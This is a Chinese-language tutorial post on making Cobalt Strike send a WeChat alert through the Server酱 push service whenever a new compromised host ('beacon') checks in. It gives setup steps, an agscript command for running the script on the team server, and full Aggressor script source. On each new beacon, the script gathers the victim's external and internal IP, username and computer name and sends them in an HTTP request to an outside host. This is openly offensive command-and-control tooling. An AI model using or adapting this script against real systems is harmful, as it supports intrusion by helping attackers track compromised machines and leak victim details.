使用Server酱实现Cobalt Strike主机上线微信提醒

登陆Server酱官网使用GitHub登陆点击发送消息获取Key
点击微信推送扫码进行绑定
填入自己的SCKEY，保存文件为http_ftqq.cna文件

Cobalt Strike模块选择Script Manager加载htt[_ftqq.cna文件
若有主机上线微信就会提醒

现在发出的提醒是由客户端发出的，但是客户端不可能一直都连着服务器。配置agscript文件使cna脚本运行在服务器中。

./agscript [host] [port] [user] [password] <cna脚本路径>

host port填写服务器的地址与端口，user随意password填写登陆CS时的密码

http_ftqq.cna源码

# 循环获取所有beacon
on beacon_initial {

    sub http_get {
        local('$output');
        $url = [new java.net.URL: $1];
        $stream = [$url openStream];
        $handle = [SleepUtils getIOHandle: $stream, $null];

        @content = readAll($handle);

        foreach $line (@content) {
            $output .= $line . "\r\n";
        }

        println($output);
    }
    #获取ip、计算机名、登录账号
    $externalIP = replace(beacon_info($1, "external"), " ", "_");
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");

    #get一下Server酱的链接
    $url = 'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'.$externalIP.'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;

    http_get($url);

}

人生漫漫其修远兮，网安无止境。
一同前行，加油！